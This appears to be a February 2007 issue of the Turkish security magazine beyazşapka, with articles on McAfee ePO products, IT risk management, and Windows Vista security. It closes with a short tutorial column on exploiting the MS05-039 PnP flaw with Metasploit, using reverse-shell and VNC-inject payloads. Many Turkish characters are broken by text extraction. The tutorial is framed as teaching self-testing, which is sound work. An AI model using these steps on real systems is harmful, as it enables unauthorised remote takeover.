tutulmas n sa lar. Registry taramas ve çerez taramas bu modül taraf ndan gerçeklefltirilir. McAfee Netshield. Novell Sunucular üzerinde koruma sa layan bu ürün Novell Netware 6.5, Netware 6.0 ve Netware 5.1 üzerine kurulabilir. Gerçek zamanl (On- Access) deste i olan ürün Novell Sunuculara karfl düzenlenecek DDoS (distributed denial of service) ataklar na karfl sistem güvenli i sa lar. McAfee Groupshield Microsoft Exchange 2000 & 2003 ve Lotus domino 5.0, 6.0, 6.5, 7 e-posta sunucular için gelifltirilmifl olan bu yaz l m e-posta yoluyla sistemleri tehdit eden unsurlara karfl Anti-virüs/Anti-Spam korumas sa lar. çerik filtrelemesi ile gelen e-postalarda oldukça detayl tarama yap labilir. Lotus e-posta sunucu ürününün Windows deste- i oldu u gibi, Solaris ve AIX deste i de mevcuttur. McAfee LinuxShield Linux sistemlerin korumas için kullan l r. Gerçek zamanl (On-Access) tarama deste i olan LinuxShield lokal arayüz veya epo üzerinden yönetilebilir. McAfee SecurityShield Microsoft ISA 2000, 2004 ve 2006 güvelik duvar üzerine kurulabilen SecurityShield yaz l m gateway korumas sa lar. SMTP, HTTP ve FTP üzerinden gelebilecek tehditler henüz a a girmeden engellenebilir. Virüs güvenli i haricinde ileri seviyede içerik filtreleme yine SecurityShield üzerinde etkinlefltirilebilir. McAfee Spamkiller modülü ile Spam korumas yine bu ürünle sa lanabilir. McAfee PortalShield Microsoft Sharepoint 2001,2003 ve Sharepoint Services yaz l mlar üzerinde koruma sa lar. Yaklafl k 300 doküman tipi desteklenir ve bu dokümanlarda virüs korumas ve içerik filtrelemesine olanak tan n r. McAfee Host Intrusion & Protection. Kurulumu ve yönetimi epo sunucu üzerinden yap labilen bir baflka güvenlik ürünü de Host Intrusion & Prevention d r. Ürün Microsoft Windows NT 4.0, 2000, 2003, XP iflletim sistemlerine kurulabilir ve bu sistemlere yap labilecek uzak veya lokal sald r lara karfl korunmas n sa lar. Entegre desktop firewall ile tek bir noktadan güvenlik duvarlar kurallar oluflturulabilir ve sistem kümelerine tek bir noktadan uygulanabilir. Çal flt r lmas istenmeyen program veya dosya uzant lar Application Blocking özelli i ile sa lanabilir. Fingerprint özelli i sayesinde dosyan n ad de ifltirilse bile çal flt r lmas na engel olunabilir. USB portlar kullan larak sisteme Flash bellek entegre edilmesi ve dosyalar n firma d fl na ç kar lmas engellenebilir. Yaklafl k 500 atak imzas n n destek verildi i üründe ayr - ca sezgisel (Behavior) tabanl koruma da mevcuttur. McAfee SCM (Secure Content Management ) Gateway korumas. Donan m tabanl olan bu ürün Gateway de SMTP, FTP, HTTP, HTTPS, POP3 ve ICAP protokolleri üzerinden gelebilecek tehditleri ortadan kald r r. Ürün Virüs, Spyware, Adware, Spam gibi tehditlere karfl koruma sa lad gibi URL ve içerik filtreleme yap labilmesine de olanak sa lar. Bridge modunda çal flabilen cihazlar a da herhangi bir de ifliklik yap lmadan entegre edilebilir. E-posta içerisinde filtreleme yap la- 10 beyazflapka flubat 2007 flubat 2007 beyazflapka 11

7 McAfee Sistem Güvenlik Yönetimi bildi i gibi 50 den fazla dosya içerisinde de bu tip içerik filtrelemesine olanak sa lar. %97 gibi baflar l bir Spam yakalama oran na sahip ürün Spam için McAfee taraf ndan gelifltirilmifl kurallar her 5 dakikada bir güncelleyebilir. McAfee Policy Enforcer McAfee Network Admission Control ürünü yine epo üzerinden yönetilebilir. epo agent yüklü olan sistemlerde epo sunucu üzerinden yarat lan politika uygulanabilir ve sistemlerin a a girifl yapabilmesi için sahip olmas gereken minimum güvenlik seviyesi, sunucu veya istemcilerde lokal olarak uygulanabilir. Sistem istenilen seviyede de ilse TDI driver kullan larak sistemin a ba lant s lokal olarak kesilir ve sadece iyilefltirme portal na gitmesine izin verilir. Sistem bu portalda istenilen güvenlik seviyesine ç kar ld ktan sonra a ba lant s yap lmas na izin verilir. epo agent yüklü olmayan sistemlerin kontrolü için uzak tarama ve Switch enforcement yap labilir ve bu tip sistemlerin switch üzerinde oluflturulan karantina VLAN lar na at lmas ve iyilefltirmelerin bu VLAN da yap lmas sa lan r. Ürün ayr ca Cisco Trust Agent 2.0 yaz l m n nda uzak yüklemesinin yap lmas n sa layabilir ve Access Control Server ile konuflarak sistemlerin a a al n p al nmamas na karar verebilir. McAfee Citadel Henüz entegrasyon aflamas nda olan bu ürün otomatik yama yönetimi, varl k yönetimi ve risk yönetiminin epo üzerinden yap labilmesine olanak tan yacakt r. McAfee Data Loss Prevention (DLP) Bilgi s z nt s (Data Leakage) ürünü entegrasyon aflamas ndad r. Sistemlerden, Kopyalama, e-posta, floppy/cd/usb gibi cihazlar kullan larak veya ç kt almak gibi yöntemler kullan larak yap labilecek s z nt lar McAfee DLP ürünü kullan larak engellenebilir. Yukar da bahsedilen tüm sistemler için farkl grafik ve text raporlama imkânlar sunulmakta ve bu raporlar n oluflturulabilmesi için ihtiyaç duyulan veri SQL sunucuda tutulmaktad r. Bu sunucu epo ile ayn sistem üzerinde olabildi i gibi uzak bir noktada hali haz rda kullan lmakta olan bir SQL sunucuda olabilir. McAfee epo yönetim platformunda kullan c say s ne kadar fazla olursa olsun sadece tek bir epo yönetim yaz l m na ihtiyaç duyulmaktad r. Farkl co rafi bölgelerdeki sistemlerin güvenlik yönetimi, yaz l m kurulumu veya güncelleme ifllemlerinin düflük h zl WAN ba lant lar üzerinden yap lmamas için McAfee, Superagent özelli ini gelifltirmifltir. Herhangi bir agent n sadece fonksiyonalitesini de ifltirerek bu özellik sa lanabilir ve da t k repository özelli i kullanarak uzak kurulumlar n veya güncellemelerin WAN ba lant lar üzerinden de il o co rafi konumdan sorumlu superagent in kendi repository si kullan larak lokal olarak yap lmas sa lanabilir. Örnek verecek olursak, 150 kullan c l bir uzak lokasyonda Antivirüs yaz l m kurulmak istenirse normal koflullarda ayn yaz l m 150 kez gönderilmek zorundad r. Ancak Superagent, epo sunucunun sahip oldu u repository nin bir kopyas n tuttu u için kurulumlar ve güncellemeler o bölgede ki lokal bir Superagent repository si üzerinden yap labilir. Yönetimi yap lacak sistemler epo üzerinde yarat lacak gruplar n alt na kümelenmekte ve sistemler bu gruplar n alt na al nmaktad r. Bu ifllem yap l rken en çok kullan lan yöntem Active Directory entegrasyonudur. Active Directory içersinde yarat lan tüm organizasyonel birimler LDAP sorusu yap larak görülebilmekte ve sistemler Active Directory den yarat lan gruplar n alt na al nabilmektedir. stenirse Active Directory organizasyonel birimler oldu u gibi epo ya al nabilir. Hangi AD OU nun hangi epo grubuna map edildi i bilgisi saklanabilir ve bir görev olarak de iflik zamanlarda otomatik olarak çal flabilir. Böylece AD ye yeni eklenen sistemler otomatik olarak epo da yarat lan gruplara da al nabilir. Sistemlerde oluflan olaylar (Virüs bulunmas, temizlenmesi, güncellenme yap lmas, kullan c taraf ndan ürünlerin silinmeye çal fl lmas vs.) epo agent taraf ndan XML dosyalar na kaydedilir ve belirli aral klarla epo sunucusuna gönderilir. epo sunucusu XML dosyalar n parse eder ve bunlar veritaban na yazar. Sistem yöneticileri baz durumlardan haberdar olmak isterse epo uyar sistemini kullanabilirler. Yaklafl k 100 den fazla olay için farkl tan mlamalar yap labilir ve sistem yöneticileri , snmp trap, Pager gibi yöntemlerle bu tip olaylardan haberdar olabilirler. Sistemlerin Virüs güvenli inin otomatize edilebilmesi aç s ndan McAfee farkl baz teknolojiler gelifltirmifltir. Bunlardan biri Rogue System Detection d r ve Network de üzerinde agent bulunmayan sistemlerin tespit edilmesi ve otomatik olarak bu sistemlere agent yüklenmesinden sorumludur. Sisteme bir kez agent n yüklenmesi demek arkas ndan istenilen güvenlik yaz l mlar n n ve bunlar n güncellemelerinin yüklenmesi anlam na geldi i için Domain in bir parças olan sistemler için tamamen otomatize edilmifl kurulum ve konfigürasyon sa lanmas anlam na gelir. RSD her bir subnet e Network ü dinleyen yaz l m tabanl sensor lerin kurulmas ile çal flabilmektedir. Bu sensor trafi i dinler ve üzerinde agent yaz l m olmayan sistemleri bulup bunlar epo sunucusuna haber verir. epo sunucu bu sistemleri ait oldu u gruplara al r ve otomatik olarak agent gönderimine bafllar. Agent yüklendikten sonra epo sunucu ile ba lant ya geçer ve kurulmas n istedi imiz yaz l mlar, bu yaz l mlar n güncellemelerini veya güncellemelerin hangi lokasyondan al naca gibi birçok kural al r ve bunlar uygulamaya koyulur. Ayn lokasyonda birden fazla subnet mevcut ise ayn sunucu&istemci üzerine her bir subnet için bir Ethernet kart tak lmak flart yla sensor say s düflürülebilir. McAfee epo güvenlik yaz l m düflük kullan c say s ndan oldukça yüksek kullan c say lar na kadar her türlü sisteme kolayl kla entegre edilebilir ve sistem yöneticilerinin yükünü minimum seviyeye indirebilir. Geliflmifl raporlama seçenekleri ile sistemlerin güvenli inin ne seviyede oldu u fazla efor harcamadan tespit edilebilir ve çok k sa zamanda ilgili önlemler al nabilir. 12 beyazflapka flubat 2007 flubat 2007 beyazflapka 13

8 Bora DAL Biliflim Sistemleri ve Risk Yönetimi: Dalgal denizlere yelken açmak Bir önceki makalede aç klamaya çal flt m risk, tehdit gibi kavramlardan ve risk yönetimi sürecinin kurulmas na yönelik ilk aflamadan sonra bu yaz da 2. ve 3. aflamalar olan Risk ndirgemesi(risk Mitigation) ve Gözden Geçirme ve Yeniden Belirleme (Evaluation and Re-assessment) konular na de inilecektir. Yaz n n ilk bölümünü; adresinden indirebilirsiniz. Risk ndirgenmesi Öncelikle bilinmelidir ki, risk yönetiminin ilk aflamas olan riskin belirlenmesi süreci ne kadar verimli geçerse geçsin, bir organizasyonun çevresindeki bütün risklerin etkin bir flekilde ortaya ç kart lmas, envanterinin yap lmas ve olas darbenin analizi mümkün de ildir. Her zaman fark edilmemifl, gözden kaçm fl ya da gerçekleflmesi durumunda darbe fliddeti küçümsenmifl ve düflük risk kategorisine konmufl tehditler olacakt r. Unutulmamal d r ki risk yönetiminin amac bütün riskleri kapsamak de il, tehditlerin gerçekleflmesi halinde darbesi organizasyona en çok zarar verebilecek olanlar n ortaya ç kart lmas d r. Risk indirgenmesi, risk yönetimi sürecinin ikinci aflamas olup risk önceliklendirmesi, ölçeklendirmesi ve ard ndan da söz konusu risk azalt c kontrollerin konulmas d r. Bir önceki paragrafta anlat ld gibi var olan tüm risklerin zarars z hale getirilmesi mümkün olmad için risk yönetimi sürecinin kurulmas n destekleyen organizasyon yöneticileri, en fiyat-etkin yaklafl mla organizasyonun operasyonel risklerinin kabul edilir seviyeye indirmeyi hedeflemelidir. Afla da risk indirgenmesi aflamas nda izlenebilecek yöntemler s ralanm flt r. Risk varsay m : Potansiyel riski kabul ederek IT operasyonlar na, riskleri kabul edilir bir seviyeye söz konusu kontrolleri kurmak suretiyle indirerek devam etmek. Riskten sak nma: Risk kayna n ve/veya sonuçlar n bertaraf ederek riskten kaç nma. Risk k s tlamas : Darbenin olumsuz etkilerini aza indirgeyen kontroller (önleyici ve fark edici) yerlefltirerek risklerin olumsuz etkisini k s tlamak. Risk planlamas : Risk indirgeme plan yaparak kontrolleri önceliklendirme, kurma ve devam ettirme yoluyla riski yönetme. Araflt rma ve anlama: Kay p riskini azaltarak zay fl veya tehdidi önleyici kontroller araflt rarak düzenlenmesi Risk aktarma: Sigorta ve benzeri çözümler kullanarak riski baflkalar na devretme. Organizasyonlar n hangi çözümü ya da çözümleri seçecekleri faaliyet gösterdikleri endüstriye ve kendilerine özel koflullara göre de iflir. Her zaman amaç öncelikli olarak organizasyonun devaml l n tehdit edecek ve söz konusu tehditlerin gerçekleflmesi durumunda kay plara yol açabilecek risklerin engellenmesi olmal d r. Risk indirgenmesinde izlenecek koflullar ve uygulamalar için farkl olsa bile genel hatlar yla sistemlerin mimarisi ve tehdit kayna ile do rudan ilgilidir. Yine temel olarak unutulmayacak nokta tehdidin her zaman var oldu u, ancak uygulanabilmek için sistemlere gereksinim duydu udur. Öncelikle riskin d fl kaynaklar, sonra da sistemlerde faydalanabilinecek zay fl klar belirlendikten sonra riskin var olup olmad sonucuna var lmal d r. Devam nda sald ran n perspektifinde, yap lacak kazanç-çaba analizini ve bizim aç m zdan ortaya ç kart lacak söz konusu kay p beklentisini kapatmak için at lacak ad mlar n bize maliyetini göz önüne alarak riskin kabul edilebilir ya da edilmez oldu unu belirleyebiliriz. Biliflim sistemleri kontrolleri Organizasyonlar n teknik, yönetim ve operasyonel güvenlik alanlar nda, organizasyonun bafl na gelebilecek ve zarar verebilecek tehditlerin oluflmas n önlemek ya da olufltuktan sonra zararlar n azaltmak için biliflim sistemleri kontrollerinden faydalanmalar gerekmektedir. Kontrol, süreçlerin kendilerinden beklendi i gibi çal flmalar - n sa layan teyit noktalar olarak görülebilir. Genel olarak kontroller kendi aralar nda 3 e ayr l r: Fark edici ve düzeltici: Süreçler beklenmedi i gibi ifllemeye bafllad nda fark edilmesini sa lar ve düzeltici yönde harekete geçer. NIST Risk Management Guide Önleyici: Süreçlerin aksamas n veya yanl fl yönde hareket etmesini engeller. Destekleyici: Baflka kontrollerin var olmas na ve süreçlerin iflleyifli yönünde kurulabilmesine olanak tan r. Risk yönetimi söz konusu olunca bahsetmemiz gereken kontroller 3 alanda tasarlanmal d r. 1. Teknik 2. dari 3. Operasyonel Haz rlad m tabloda baz örnek kontroller ve ilgili olduklar alanlar belirtilmifltir. Bu tabloya organizasyona özel eklemeler de yap labilir. Kontrollerin süreçlere eklenmesi s ras nda en çok dikkate al nmas gereken nokta maliyet-yarar analizidir. En baflta da belirtildi i gibi e er bir kontrolün bir sürece eklenmesinin maliyeti, o sürecin beklenmedi i gibi gitmesi durumunda oluflacak zarardan fazlaysa, gereklili i iki defa de erlendirilmelidir. Unutulmamal d r ki eklenen kontroller asla riskleri tamamen kapatmaz, en iyimser yaklafl mla minimal seviyeye indirir. Gözden geçirme ve yeniden belirleme Risk yönetimini oluflturan ilk iki aflaman n sonuçlar n n organizasyonun o anki halini yans tt n unutmamak laz md r. Organizasyonun sürekli de iflti i, bununla beraber, süreçlerin, uygulamalar n ve altyap n n da sürekli de iflim halinde oldu- u gözlemlenebilir. Bin bir u raflla (ya da kolayca) kurulmufl bir risk yönetimi sürecinin, organizasyonun de iflimine ayak uydurmas hayati önem tafl maktad r. Bunun için periyodik olarak de ifliklikler ele al nmal, ilk iki aflama gözden geçirilmeli ve yeniden yap land r lmal d r. Bunu yaparken yeni yasal gereksinimler de gözden geçirilmeli, risklerin tehdit seviyeleri gerekirse de ifltirilmelidir. Alan Kontrol turu Kontrol Gizlilik Bütünlük Süreklilik Fark edici ve düzeltici Sistem kay tlar n n incelenmesi zinsiz giriflleri fark etme ve uygun hareket etme mekanizmas Sistem veri bütünlü ü analizi Güvenli geçmifl zamana dönme Virüsleri tan mlama ve engelleme Önleyici Sistem kimlik do rulamas Kullan c yetkilendirme nkar edilemezlik Eriflim kontrolleri Güvenli iletiflim fllem gizlili i Destekleyici Kullan c, süreç ve bilgi kaynaklar n n ay rt edilebilmesi Kriptografik anahtar yönetimi Güvenlik yönetimi Fark edici ve düzeltici Personelin ifle al m öncesi araflt r lmas Var olan kontrollerin gözden geçirilmesi Dönemsel sistem denetimleri Etkin olay-tepki sistemi Gereksinimlere uygun tasarlanm fl, yönetim taraf ndan onaylanm fl ve düzenli olarak test edilmifl güncel is süreklili i ve felaket kurtarma plan. Önleyici Önemli sistemlere sorumlu atanmas Güvenlik plan ve var olan kontrollerin dokümantasyonu Görev ayr m ilkesi ve gereksinildi i kadar kullan c hakki verilmesi Kullan c lara güvenlik bilincinin afl lanmas ve e itim Fark edici ve düzeltici Organizasyon içi fiziksel güvenlik Önleyici Veri da t m n n kontrollü yap lmas Veri medyas n n elden ç kart lma aflamas nda izlenecek yöntemin belirlenmesi Kritik alanlar n fiziksel eriflim k s tlamalar Veri iletim yollar n n güvenli i Gereksinimler do rultusunda haz rlanm fl veri yedeklenme prosedürü ve bunu destekleyici yaz l m ve donan m. Yede in güvenli ve farkl bir yerde tutulmas Tafl nabilir bilgisayar ve PDA deki veri güvenli i ile ilgili önlemler Gereksinimler do rultusunda ayarlanm fl yedek güç üniteleri Kritik sistemlerin bulundu u ortamlar n çevresel kontrolleri (nem, isi...) sa lanmas Teknik dari Operasyonel KAYNAKÇA NIST Risk Management Guide for Information Technology Systems 14 beyazflapka flubat 2007 UK: RMI Risk Management Standard Wikipedia ISACA - Control Journal Makale : Living With Risk flubat 2007 beyazflapka 15

9 Mehmet ÜNER Windows Vista Güvenlik Özellikleri Microsoft taraf ndan, Kas m ay nda kurumsal versiyonlar ve Ocak ay nda da kiflisel versiyonlar piyasaya sürülen Windows Vista, Microsoft un tarihinde gelifltirdi i en büyük IT projesi. Yap lan yat r m, çal - flan kifli say s ve geçen süre göz önüne al nd nda belki de dünyadaki en büyük IT projesi olmaya aday. Türkiye de Kas m ay ndan beri birçok kurumun kullanmaya bafllad Windows Vista, Microsoft Zirvesi ndeki lansman yla beraber ev kullan c lar yla da buluflmaya bafllad. Windows Vista özellikle kullan c arayüzü, yönetilebilirlik, bilgiye kolayca ulafl m ve güvenlik konusunda çok yeni geliflmelere sahip bir iflletim sistemi. Bu yaz da sadece güvenlik özellikleri üzerinde duruyor olaca z. Güvenlik bak m ndan oldukça geliflmifl olan Windows Vista n n yeni güvenlik özellikleri 4 ana bafll k alt nda toplanabilir (fiekil 1): Temeller: Mühendislik Güvenli Eriflim Malware ve Sald r lara Karfl Koruma Bilgiyi Koruma flamdöngüsü nün (SDL) en önemli özelli i, daha tasar m aflamas nda güvenli in ön planda olmas, kodlama yap l rken güvenlik dan flmanlar n n kodlamay kontrol etmesi ve kodlamadan sonra da güvenlik testleri/de erlendirmelerin de ürün gelifltirmenin bir parças olmas d r. SDL, sonuçlar n Windows Server Service Pack 1 ve Windows XP Service Pack 2 ile göstermiflti. Bu paketler iflletim sistemlerini daha güçlü ve güvenli hale getirmiflti. fiimdi Vista, tamamen SDL ile yaz lan bir iflletim sistemi oldu u için güvenlik bak m ndan Microsoft un ç kard en güçlü iflletim sistemi durumunda. fiekil -2 Servis güçlendirmesi de Vista n n temel güvenlik özelliklerinden biri (fiekil 2). Servisler art k daha düflük haklarla çal flt r l yor. Windows servisleri art k sadece a üzerinde, dosya sisteminde ve kay t defterinde izin verilen yerlere eriflebiliyor ve servis profilinde olmayan yerlere eriflemiyor. Böylece sald r lara karfl birçok aç k, en bafltan kapat lm fl oluyor. Ayn zamanda servis bafl na güvenlik tan mlay c lar sayesinde servisler kendi haklar n koruyabiliyorlar. Windows Vista n n Güvenli Eriflim bafll alt ndaki en önemli özellikleri ise Kullan c Hesab Kontrolü, geliflmifl Audit yetenekleri ve USB cihazlar n daha etkin yönetebilme olarak s ralanabilir. Birçok kurumun bafl n a r tan, kullan c lara admin yetkisi verilmesi sonucunda oluflan güvenlik sorunlar art k ortadan kalk yor. Kullan c lar art k standart hesaplar yla daha fazla ifllem yapabiliyor (time zone, güç ayarlar, VPN gibi) ve önceden onay verilmifl cihazlar yükleyebiliyorlar. fiekil -3 Vista Firewall Bunun d fl nda yönetici hakk na sahip olmalar gerekti inde geçici olarak yönetici seviyesine yükseltiliyor ve ifllem bittikten sonra tekrar standart kullan c seviyesine indiriliyor. Böylece kullan c n n onay olmadan arkaplanda hiçbir fley yüklenemiyor veya çal flam yor. Bu özellik arka planda çal - flan zararl kodlar tamamen engelleyecek gibi gözüküyor. Normal çal flanlara ek olarak flirketin IT yöneticileri bile standart kullan c larla çal flabiliyor. Audit k sm nda ise alt kategoriler, filtreleme seçenekleri ve geliflmifl kullan c deneyimi Windows Vista n n sundu u yeni özelliklerden. Güvenli Eriflim özelliklerinin önemli bir parças da USB cihazlar üzerinde birçok politikan n hayata geçirebilmesi. Kurumlar n karfl laflt en önemli zorluklardan biri de USB cihazlarla d flar ya s zan kuruma ait kritik bilgiler. Birçok kurum bunu engellemek için bilgisayarlar ndaki USB portlar n tamamen kapatmakta. Bu da USB klavye, fare gibi çevresel Güvenlik geliflmelerinin ilk topland bafll k Temeller. Temel güvenlikte ilk bahsedilmesi gereken özellik ise Windows Vista n n Security Development Lifecycle (Güvenlik Gelifltirme Yaflamdöngüsü) ile yaz lm fl ilk iflletim sistemi olmas y l nda Bill Gates in öncülü ünde bafllayan Trustworthy Computing (Güvenli Biliflim) hareketi ile Microsoft önceliklerini ve ifl yap fl tarz n tamamen de ifltirdi. Bu tarihten sonra Güvenlik, ürün gelifltirmenin her alan nda ön planda tutulmaya bafllad. Windows yaz l mc lar zorunlu güvenlik e itimlerinden geçirildi ve iflletim sistemlerinin her bilefleni güvenlik bak m ndan ayr ayr ele al nd. Güvenli Gelifltirme Ya- fiekil 1 - Windows Vista Güvenlik Özellikleri 16 beyazflapka flubat 2007 flubat 2007 beyazflapka 17

10 Windows Vista Güvenlik Özellikleri cihazlar n kullan m n tamamen engellemekte. Windows Vista ile gelen yeni özellikler sayesinde USB girifllerinde IT yöneticilerine tam kontrol sa lanm fl durumda. Yöneticiler art k isterlerse USB sabit disk, bellek ünitelerini engellerken, USB klavye, fare ve de iflik cihazlara izin verebilecekler. nternet ve bilgiye sürekli ba l olma iste i art k hayat m z n vazgeçilmez bir parças. Ama internet ve bilgiye sürekli ba l olmak, kurumlar ve kiflileri birçok sald r ya aç k duruma getiriyor. Windows Vista, getirdi i malware ve sald r lara karfl koruma özellikleri sayesinde bu aç klar kapat yor ve sald r lar önlemek için birçok yeni özellik sunuyor. Bunlar n en bafl nda Internet Explorer 7.0, Güvenlik Duvar, Windows Defender, NAP (Network Acces Protection) ve ASLR (Address Space Layout Randomization) geliyor. fiekil -4 NAP (Network Access Protection) Internet Explorer 7.0 n korumal modda çal flma özelli i sadece internet taramas yap lmas na izin verir ve yaz l m yüklemek gibi ifllemlerin yap lmas na izin vermez. Salt Okunur modda çal flma özelli i ise, sadece Temporary Internet Files dizininin alt na eriflime izin verir. Böylece internetten gelebilecek güvenlik tehditleri iflletim sisteminin di er yerlerine eriflemez. Ayr ca günümüzde çok büyük bir sorun olan Phishing sald r lar na karfl da yeni Internet Explorer bir Phishing Filtresi sunmaktad r. Böylece kullan c lar Phishing sitelerine eriflirken ekrana uyar lar ç kar ve eriflim engellenir. Phishing Filtresi, veri kayna için global veri kayna a n kullan r ve birkaç saatte bir kendini güncellefltirilir. Ayn zamanda web sayfalar n, kullan c verisini çalmaya çal - flan sayfalar n bilinen özelliklerine göre analiz eder ve böylece bir veri kayna na ihtiyaç duymadan da koruma sa layabilir. Windows Vista n n içinde art k çift tarafl bir Güvenlik Duvar (Firewall) bulunmakta (fiekil 3). Böylece hem içeriye hem de d flar ya do ru statefull IPv4 ve IPv6 filtreleme yap labilmekte. Ayn zamanda d flar ya do ru uygulama tan yan bir filtreleme de Windows Vista n n sa lad güvenlik özelliklerinden. Yönetim bak m ndan ise Güvenlik Duvar ve IPSec yönetiminin birlefltirilmesi özellikle IT yöneticilerinin iflini çok kolaylaflt rd. Spyware, bugün karfl lafl lan en büyük güvenlik sorunlar ndan birisi. Özellikle birçok kurum için spyware sorunu virüs sorunlar n n önüne geçmifl durumda. Windows Vista ise spyware e karfl içinde Microsoft un tarihindeki en popüler ürünlerinden biri olan ve birçok kullan c taraf ndan be enilen Windows Defender i bar nd r yor. Windows Defender, spyware gibi istenmeyen yaz l mlar gerçek zamanl olarak alg l yor ve onlar sistemden temizliyor. Ayr ca Basit ve kolay kullan c arabirimi ile tüm kullan c lar için yüksek bir koruma sa l yor. Network Access Protection (NAP) Client, yine Vista n n içinde yer alan güvenlik özelliklerinden biri (fiekil-4). NAP, flirket içindeki tüm iletiflimin kimli i do rulanm fl, yetkilendirilmifl ve sa l kl bir flekilde yap lmas n sa l yor. IT yöneticilerinin belirledi i güncellemeler, antivirüs program, firewall program ve kurallar olmayan bilgisayarlar n flirket a içerisine girmesini engelliyor X d fl nda DHCP, VPN ve IP- SEC seviyesinde derinlemesine güvenlik sa layabiliyor. Sald r lara karfl koruman n son özelli i ise Address Space Layout Randomization (Rastgele Adres Yeri Belirleme). Bu özellik sayesinde, Windows Vista yüklenirken DLL ve EXE ler haf za içindeki 256 de iflik yere konulabiliyor. Bu da zararl kodun, onlar bulmas n ve kullanmas n oldukça güçlefltiriyor. ASLR nin en önemli özelli i, sald r lara karfl iflletim sisteminin yerini haf za içinde gizlemesi. Windows Vista n n sahip oldu u güvenlik özelliklerinin son bafll da Bilgiyi Koruma. Bitlocker teknolojisi, Vista yla beraber gelen en önemli güvenlik özelliklerinden biri (fiekil-5). Bitlocker sayesinde bütün iflletim sistemi flifrelenebiliyor. Böylece özellikle mobil cihazlar n kaybolmas veya çal nmas durumunda d flar ya bilgi s zmas engelleniyor. Windows Vista n n Bitlocker taraf ndan korunan sürücü, baflka bir bilgisayara tak ld zaman içindeki hiçbir bilgi okunam yor. Bu özellik için Trusted Platform Module (TPM) v1.2 kullan l yor. fiifreleme için gerekli olan anahtarlar sald - r lara karfl dayan kl TPM modülü içerisinde saklan yor. Ayn zamanda farkl Bitlocker yap land rmalar (TPM, USB, TPM + fiifre, TPM + USB gibi) ile güvenlik derecesi daha da artt - r labiliyor. Bitlocker d fl nda EFS (Encrypting File System) deki geliflmeler ise, anahtarlar n Smart Card larda fiekil-5 saklanabilmesi ve USB sürücülerinin de flifrelenebilmesi. Son olarak da RMS (Rights Management Services) Client, Vista n n içine entegre edilmifl durumda. Bilgi koruman n en önemli yöntemlerinden biri olan RMS sayesinde dokümanlar ve e-postalar, kullan c baz nda verilen haklara göre korunabiliyor. Böylece istenmeyen e-postalar n d flar ya iletilmesi veya kritik dokümanlarda bilgilerin kopyalanmas gibi sorunlar ortadan kalk yor. Windows Vista gelifltirilirken, temel ve ek güvenlik özellikleri sayesinde dünyan n en güvenilir iflletim sistemi olmaya aday gibi görünüyor. Bugün kurumlar n ve son kullan c lar n güvenlik bak m ndan karfl laflt klar birçok sorunu çözecek olan Windows Vista, art k son kullan c lar için de haz r durumda. 18 beyazflapka flubat 2007 flubat 2007 beyazflapka 19

11 Erkan fien Underground GEÇEN SAYIMIZDA MSF (METASPLOIT FRAMEWORK) N KULLANIMINI KOMUTLAR LE ANLATMI TIK. BU SAYIMIZDA DA MSF N KULLANIMINI KONSOL VE WEB ARAYÜZÜNÜ KULLANARAK B R ÖRNEK LE AÇIKLAMAYA ÇALI ACA IZ Bunun için öncelikle test yapaca m z sistem üzerindeki aç klar, bir aç k tarama yaz l m ile kontrol edece iz. Ben bunun için Nessus yaz l m n kulland m. Kulland m z tarama yaz l m ile MSF in exploit bilgi bankas ndaki de erleri karfl laflt rmam z gerekiyor. Biz testlerimiz s ras nda MS makalesinde bildirilen MS aç n kullanaca z. Yandaki resimde test yapaca m z sistem üzerinde Nessus un buldu u aç görebilirsiniz. fiimdi geçen say m zda de indi imiz komutlar yard m ile uzak sistemin yönetimini ele geçirmeye çal flaca z. lk olarak kullanaca m z komut sizinde hat rlayaca n z gibi MSF konsolumuzu çal flt rd ktan sonra msf > show exploit komutu. Bu komut yard m ile ilgili exploit leri listeleyerek bizim kullanaca m z exploit in kullan m ad n bulaca z. Afla daki resimler bu konuda gerekli aç klamay verecektir. lgili exploit bulduktan sonra msf > use ms05_039_pnp komutu yard m ile Nessus kullanarak buldu umuz exploit i seçiyor ve ayarlar n yapmak üzere haz r hale getiriyoruz. Bu ayarlarda iflletim sistemi, toplu güncellefltirme ve IP adresi gibi bilgilerimizi sisteme vererek kullan ma haz r hale getiriyoruz. Bu bilgilerin elimizde olmad durumlarda genel ayarlar yard m ile de ilerleyebiliriz. Ancak sistem bilgileri birçok yaz - l mla elde edilebilece i ve ço unlukla tespit etti imiz aç klarda bunu bize belirtti i için ince ayarlar yapmak daha etkin ve kullan fll bir yöntemdir. Hedef sistemin iflletim sistemi ve SP bilgilerini biliyorsak bunu belirtiyoruz. E er bu bilgileri elde edemediysek genel tan mlar kullanabiliriz. msf > show targets komutu yard m ile kullanabilece imiz seçenekleri görüyoruz ve msf > set TARGET x komutu yard m ile seçiyoruz. Son olarak exploit edece imiz sistemi nas l yönetece imizi seçiyoruz. Bunun için msf > show payloads komutu ile kullanabilece imiz yöntemleri listeletebiliriz. Burada hedef sistemin iflletim sistemi ve ba lant tipi önemli. E er hedef sistemin ba lant s yavafl bir ba lant ysa ve bize komut sat r yeterli olacaksa msf > set PAYLOAD win32_reverse komutunu kullanabiliriz. Bu bize hedef sistem üzerinde bir konsol açacak ve istedi imiz komutlar çal flt rmam z sa layacakt r. Ancak geçen say m zda da belirtti im gibi sistem üzerinde do rudan bir kontrol ifllemi baz avantajlar da sa layabilir. Sistemi VNC kullanarak yönetmek için msf > set PAYLOAD win32_reverse_vncinject komutu kullan labilir. Burada kullan lan VNC sunucusu özel olarak derlenmifl ve herhangi bir kay t defteri de eri veya sabit disk kullan m na ihtiyaç duymadan Metasploit yaz l m n kullanarak hedef seçimi ve sisteme s zma iflleminin ekran görünümü haf zada çal flan özel bir derlemedir. Tüm bu ayarlar yap ld ktan sonra msf > exploit komutunu çal flt rarak sistemi yönetmeye bafllayabiliriz. Afla da da ekran görüntüsünü gördü ümüz gibi sistemin yönetim ekran karfl m za otomatik olarak aç lacakt r. Bundan sonra istedi iniz her ifllemi uzaktan yönetti iniz sistem üzerinde sa layabilirsiniz. Bu say m zda geçen say da teorik olarak anlatt m z MSF kullan m n bir örnek ile aç klamaya çal flt k. Son olarak hat rlatmak isterim ki, MSF kullan m na yer vermemizin sebebi sadece kendi sistemlerinizi test etmeniz ve korsanlar n nas l çal flt n anlaman zd r. Kullanaca m z exploit i seçtikten sonra msf > set RHOST x.x.x.x ve msf > set LHOST x.x.x.x komutlar yard m ile hedef ve kaynak sistemleri belirtiyoruz. 20 beyazflapka flubat 2007 flubat 2007 beyazflapka 21

